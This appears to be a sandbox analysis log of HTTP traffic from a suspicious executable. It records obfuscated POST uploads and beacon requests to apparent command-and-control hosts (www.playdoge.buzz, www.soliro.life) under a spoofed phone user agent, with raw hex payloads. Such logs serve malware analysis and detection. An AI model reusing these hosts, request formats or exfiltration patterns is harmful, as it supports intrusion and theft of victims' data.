ZXzt1jdX=6jmeEH8YiR/6w5NEIcPxPO9v24GD3ExanF/ZOQyIO7wFtQRbWbzbp3V7Gbqngptl7IPx9oKoR6n2mvPkIxInbHa59BPhpcmuuuHKRudp6H/Y+SjQ2R1gPBs58+7F7jKS4V21l1KYyJ522I0KVc6wiGF/qTWTgkedjn7E0VoiWBQA5ZDC0Xg7zh8W09F4Xc/pn0eozwNYnCX7fv/7fQaGyhRNGR560uH/npF2VIL0miP5cBEAcyFOMuHpeJ3OOSBPkW1b/HunsItzPbD9IFvIlIgC/LJMQBHQiqaioEPTt0BYEXplvahY/6JLV0gWa5L8u1yqBs0zxKHvCB9RISiNb45+nJ3ac6qHixVQSHoO7uOVtOpjuHae8eqRjanGFLy+0pPVqGk5LGAYrmNQN8S2FI8iPVaPoxY8zAWSeAahCcMYGXxdPvC3LI+PtiNO90hbiD67ZuzQ6lVh1+lFFcth23HDBjkWBTn9L5vyni+A6/P0GhAd69Cm8I9h5/PsbyUhg8NZDb90K6zqpKOzSAhm+4g4GVSY7AuJymC7gPYXjtQ+CO13ic9L/mmVP2W++S+PBjeZMXL4NlHDcOR+cR9bHfVgw/laiY+ncn1aHgU5zt4NectEajn8E+R0jICA8IGvrFF8Jx1OpYXcHbchudNU8+rsmiEcJ8mshpGZNzbTPkL+ZWG3ygZRZJxc27V6aYHspeGFylj2fwMe1m+GLh6ziyHGmRr0fqCLFRNkNqo2969hEg/rcuU2wu6svlbnkczxW6Drqr+OH4bKQYRtsAeOkwqvt5EH/zm5WvzbkXU/O6dbuAjuL8m317N1iAmXSaSLkgSeGS+ZdkkyrYB/Qp/jn8qpMi7HdQRp9TceFeoNTZnB0KdoZ+9BHQ64JJ+NsYO0h2geei6/L1/rGX3FyCrbZ0De6YN2coR0dtGQLLXoouDq3OeP7+5zPyE1rC7mFNiUPmQpmfu8gNKAgGrLzlSdP1wNiDwv2A/1Pitc61vO5vo [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	58097	3.33.244.179	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:13.905962944 CEST	420	OUT	GET /qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx HTTP/1.1 Host: www.soliro.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:04:14.366570950 CEST	394	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 31 Aug 2024 12:04:14 GMT Content-Type: text/html Content-Length: 254 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 58 7a 74 31 6a 64 58 3d 33 68 4f 2b 48 79 49 63 67 42 36 47 2b 38 4e 33 4c 4e 32 75 48 65 6b 58 37 75 53 49 34 67 68 44 6b 57 44 5a 61 68 47 78 4b 37 67 33 79 42 35 43 55 35 76 42 38 45 56 6b 47 4f 4b 6c 71 61 46 35 75 65 75 61 6c 4c 79 51 48 4b 6e 75 38 4d 76 37 4c 78 6b 35 58 7a 75 59 78 67 48 7a 6b 36 6e 6b 72 4d 54 31 4d 65 52 6a 77 31 36 61 6a 6a 72 43 6a 79 67 6a 52 54 77 3d 26 66 56 55 38 3d 48 52 7a 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	58098	188.114.97.3	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:19.413223028 CEST	694	OUT	POST /dkjp/ HTTP/1.1 Host: www.playdoge.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.playdoge.buzz Referer: http://www.playdoge.buzz/dkjp/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 74 30 66 55 34 69 52 34 4a 78 2b 70 59 37 4f 50 32 77 32 45 42 6d 45 30 38 53 45 6a 33 63 79 56 52 4e 61 65 79 73 6f 6c 55 6d 4c 6a 43 54 4c 44 66 49 56 37 6a 57 2f 7a 2f 4a 54 73 56 54 78 69 44 52 46 54 65 36 47 70 66 2b 72 59 6d 35 57 38 61 79 6a 59 41 52 76 4c 56 54 4c 31 72 57 76 54 49 4d 57 31 70 2f 32 79 6a 46 6c 72 39 49 30 37 45 6f 41 67 2f 68 59 74 67 53 58 6f 4b 49 4b 4e 70 41 45 39 42 31 72 4d 6b 50 47 51 48 67 7a 31 56 73 44 7a 58 74 35 6e 34 33 31 64 79 59 69 75 67 46 79 45 4f 76 54 39 49 4d 4c 71 51 42 41 31 57 58 69 68 46 6f 7a 61 50 61 48 2b 42 59 71 77 70 77 3d 3d Data Ascii: ZXzt1jdX=t0fU4iR4Jx+pY7OP2w2EBmE08SEj3cyVRNaeysolUmLjCTLDfIV7jW/z/JTsVTxiDRFTe6Gpf+rYm5W8ayjYARvLVTL1rWvTIMW1p/2yjFlr9I07EoAg/hYtgSXoKIKNpAE9B1rMkPGQHgz1VsDzXt5n431dyYiugFyEOvT9IMLqQBA1WXihFozaPaH+BYqwpw==
Aug 31, 2024 14:04:19.875938892 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:04:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, max-age=0 pragma: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYGPKBluqdZiBC4TFP%2FOeD9eFU%2BPTr2U7PPOi9n%2B0sH5hjdurdVj9TCNKt61YwK%2FKKu6cxLFhn%2BD%2BtfgNlX4bk0DMqt2s6TwL26wEAm32x91qK1QLMI5zsqIfgXrYQHKaLOddA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbce1e7c9620f3f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 32 63 31 0d 0a 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 [TRUNCATED] Data Ascii: f2c1dTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1ofRr9)C^*Ev[RHneR=HeXW9}"
Aug 31, 2024 14:04:19.875953913 CEST	205	IN	Data Raw: cf 72 91 fb 43 f5 73 fd 16 ef 52 af 5a 17 14 86 09 0a b9 3f 40 74 86 14 84 6d 2b df 8a c5 d4 6f f3 f5 4d d5 ba 43 16 b5 54 6e 5f 82 98 80 e2 04 5a ad d7 0b 78 1e c4 ed dd 0d 90 8d c8 53 15 b6 a1 b9 0f 6e a7 cc 11 bc db 63 40 05 ed 11 3e 11 e3 17 Data Ascii: rCsRZ?@tm+oMCTn_ZxSnc@>l$_{2bW"*`-;mq[(N)LvGV-@FN/@1xyIfbb+a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	58099	188.114.97.3	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:21.956650019 CEST	714	OUT	POST /dkjp/ HTTP/1.1 Host: www.playdoge.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.playdoge.buzz Referer: http://www.playdoge.buzz/dkjp/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 74 30 66 55 34 69 52 34 4a 78 2b 70 4b 49 47 50 31 54 65 45 45 47 45 72 68 69 45 6a 39 38 79 52 52 4e 57 65 79 6f 78 2b 55 54 6a 6a 46 33 50 44 65 4a 56 37 69 57 2f 7a 71 35 54 74 62 7a 78 72 44 52 4a 6c 65 37 36 70 66 2f 4c 59 6d 34 6d 38 62 44 6a 66 42 42 76 4a 64 7a 4c 72 32 47 76 54 49 4d 57 31 70 38 4c 76 6a 46 39 72 39 59 45 37 46 4a 41 6a 31 42 59 69 70 79 58 6f 4f 49 4b 33 70 41 45 50 42 30 32 6a 6b 4b 4b 51 48 68 6a 31 56 64 44 38 41 39 35 70 32 58 30 38 32 4c 2b 6d 75 33 54 56 46 4a 48 2b 50 6f 44 64 63 6e 52 76 48 6d 44 32 58 6f 58 70 53 64 4f 4b 4d 62 58 35 79 35 53 77 43 4a 61 6c 6f 30 6d 50 48 78 58 6a 34 50 77 70 68 2f 49 3d Data Ascii: ZXzt1jdX=t0fU4iR4Jx+pKIGP1TeEEGErhiEj98yRRNWeyox+UTjjF3PDeJV7iW/zq5TtbzxrDRJle76pf/LYm4m8bDjfBBvJdzLr2GvTIMW1p8LvjF9r9YE7FJAj1BYipyXoOIK3pAEPB02jkKKQHhj1VdD8A95p2X082L+mu3TVFJH+PoDdcnRvHmD2XoXpSdOKMbX5y5SwCJalo0mPHxXj4Pwph/I=
Aug 31, 2024 14:04:22.439558029 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:04:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, max-age=0 pragma: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Saxbh3XZbzatdsLCj8P8CisZ6wL7kM0wkeAgbhBDhQ7XNu3oj1htr5UzP%2FwrgyQcxDdaj0s0%2BVLHZVzv994iblhRr%2B7v4b7poApAbrNsfsDMYiaJkj55Z%2BejkCr69T55dwvfmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbce1f7ce2b436c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 32 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c [TRUNCATED] Data Ascii: 2cbdTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1ofRr9)C^*Ev[RHneR=HeXW9}"rCsRZ
Aug 31, 2024 14:04:22.439604044 CEST	191	IN	Data Raw: 14 86 09 0a b9 3f 40 74 86 14 84 6d 2b df 8a c5 d4 6f f3 f5 4d d5 ba 43 16 b5 54 6e 5f 82 98 80 e2 04 5a ad d7 0b 78 1e c4 ed dd 0d 90 8d c8 53 15 b6 a1 b9 0f 6e a7 cc 11 bc db 63 40 05 ed 11 3e 11 e3 17 8f a8 e0 1f 6c e1 cb 24 5f ed 9b 7b 83 32 Data Ascii: ?@tm+oMCTn_ZxSnc@>l$_{2bW"*`-;mq[(N)LvGV-@FN/@1xyIfbb+a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	58100	188.114.97.3	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:24.504113913 CEST	10796	OUT	POST /dkjp/ HTTP/1.1 Host: www.playdoge.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.playdoge.buzz Referer: http://www.playdoge.buzz/dkjp/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 74 30 66 55 34 69 52 34 4a 78 2b 70 4b 49 47 50 31 54 65 45 45 47 45 72 68 69 45 6a 39 38 79 52 52 4e 57 65 79 6f 78 2b 55 54 37 6a 43 43 62 44 66 71 4e 37 77 47 2f 7a 32 70 54 57 62 7a 77 35 44 56 73 73 65 37 33 63 66 37 37 59 6e 61 75 38 4f 42 62 66 49 42 76 4a 43 44 4c 32 72 57 75 52 49 50 75 78 70 38 62 76 6a 46 39 72 39 62 63 37 4d 34 41 6a 7a 42 59 74 67 53 58 53 4b 49 4c 35 70 45 6f 66 42 30 69 4a 78 70 43 51 41 41 54 31 58 50 72 38 66 4e 35 72 37 33 30 65 32 4c 7a 34 75 33 2f 5a 46 4a 61 62 50 76 44 64 50 44 38 55 45 46 48 53 4d 37 66 52 4a 4b 6e 71 4b 70 37 73 79 35 61 59 46 61 4c 39 30 55 61 61 63 6d 47 34 73 2f 55 4a 2b 62 33 4d 46 78 47 2f 4d 64 35 62 6a 69 4f 53 49 55 37 45 4f 59 67 62 68 37 78 58 45 68 68 51 39 72 74 6a 32 74 2b 50 79 4d 78 68 66 73 34 7a 6d 63 58 45 54 46 50 50 6d 47 5a 44 6f 6c 6d 49 58 61 71 6a 6d 66 50 58 38 79 65 6a 6f 54 63 2b 52 67 46 4d 51 79 30 55 73 67 51 59 43 42 42 6e 4b 45 70 53 6e 43 4a 46 73 6d 52 65 66 56 52 77 41 75 31 4c 70 [TRUNCATED] Data Ascii: ZXzt1jdX=t0fU4iR4Jx+pKIGP1TeEEGErhiEj98yRRNWeyox+UT7jCCbDfqN7wG/z2pTWbzw5DVsse73cf77Ynau8OBbfIBvJCDL2rWuRIPuxp8bvjF9r9bc7M4AjzBYtgSXSKIL5pEofB0iJxpCQAAT1XPr8fN5r730e2Lz4u3/ZFJabPvDdPD8UEFHSM7fRJKnqKp7sy5aYFaL90UaacmG4s/UJ+b3MFxG/Md5bjiOSIU7EOYgbh7xXEhhQ9rtj2t+PyMxhfs4zmcXETFPPmGZDolmIXaqjmfPX8yejoTc+RgFMQy0UsgQYCBBnKEpSnCJFsmRefVRwAu1Lplj/y0jFe8fWRLDRwpCAhdftOCbY2ZFbAHZyX6dR9QZ5+nZrVIreXnWGSTongt2gLXimpyYxJ0IzLzxAMRQU0PHEZ6hiRhIQQ5+0z1rZNJL/GhdkLcrmej8fyMNQkQK1IAiwR3nTNOrSqwqH0gVdCyg+hWGSn88x3peCKHTF3afcWvmSiVNtuQTofRv7QkPhVYDdUFMgd7gYEv34ci4KmeAwy7fel7fJM8cBteNlTplTDi7nm8C5++UY2ysopkwH9HHx4cgzC19LskxYcEAkFkuKusYZD6xHcp6oL8klbjvWgxDD98PdOTtz4vVuEUHDbmAEBPKb454MQrN5k3nYuiGN9IaybpkhAm/UR4k1E7CmjxdzVyxZgwRGSz9yfy/O52UIQrp+fG6yjrkSP/U1GHx6RvxW3k+3lEkcPWlppw+CcUEtuE2iQXlmPBAGaWO8UtQMF8UGsooQ0SWYktY+ZrdS6+E2fznBfGb2eGuf3xFFoS1gFGOGWAPJOxj/g0POiLuzqzesA/FeTFVPZ0z6tunalaB7M8pStPHIAituTZZtHvuSIYrd0tHurQSW7yARGdaKm3DQlkMVuUMmFaLVW7R+uujKKIsGZor8KJSwkMDZR/uLfA1FaL8rAmAiq7Rqb0nhXWrJHaxrWqF67McC8ON574ZUSmjS+6T [TRUNCATED]
Aug 31, 2024 14:04:24.975390911 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:04:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, max-age=0 pragma: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLC0p9NnwOnRhL%2BhpHt8oYW5aC%2F3%2FOm8%2FABUV2cSWcfrv8%2FB6859qLQYvk2%2BPPqE6KNBeXmay9wA0yBXuSl4XdWglYLvqP%2BSxToL0BlXokgCE%2FaPt4nbuxMiCW3qwCQE2Tz%2Flg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbce207affa0f49-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 32 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c [TRUNCATED] Data Ascii: 2d6dTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1ofRr9)C^*Ev[RHneR=HeXW9}"r
Aug 31, 2024 14:04:24.975408077 CEST	196	IN	Data Raw: 43 f5 73 fd 16 ef 52 af 5a 17 14 86 09 0a b9 3f 40 74 86 14 84 6d 2b df 8a c5 d4 6f f3 f5 4d d5 ba 43 16 b5 54 6e 5f 82 98 80 e2 04 5a ad d7 0b 78 1e c4 ed dd 0d 90 8d c8 53 15 b6 a1 b9 0f 6e a7 cc 11 bc db 63 40 05 ed 11 3e 11 e3 17 8f a8 e0 1f Data Ascii: CsRZ?@tm+oMCTn_ZxSnc@>l$_{2bW"*`-;mq[(N)LvGV-@FN/@1xyIfb+a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	58101	188.114.97.3	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:27.062438011 CEST	422	OUT	GET /dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM= HTTP/1.1 Host: www.playdoge.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:04:27.549102068 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:04:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, max-age=0 pragma: no-cache vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86bjImJuA%2F0n%2FLRlXncLifTMO8foW0m6pZmkbOKPGuEQliLrgn%2FOSmy2p3N1nV81Fms1VX0qapfeTVy4RQ%2FS95kODoe8MNPU5IjsdAj1jTgB4QrN74KSuWY%2FaXhwVHl6pa9JRw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbce217be612363-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 34 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 [TRUNCATED] Data Ascii: 4e0<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
Aug 31, 2024 14:04:27.549197912 CEST	692	IN	Data Raw: 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 Data Ascii: gin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	58102	85.159.66.93	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
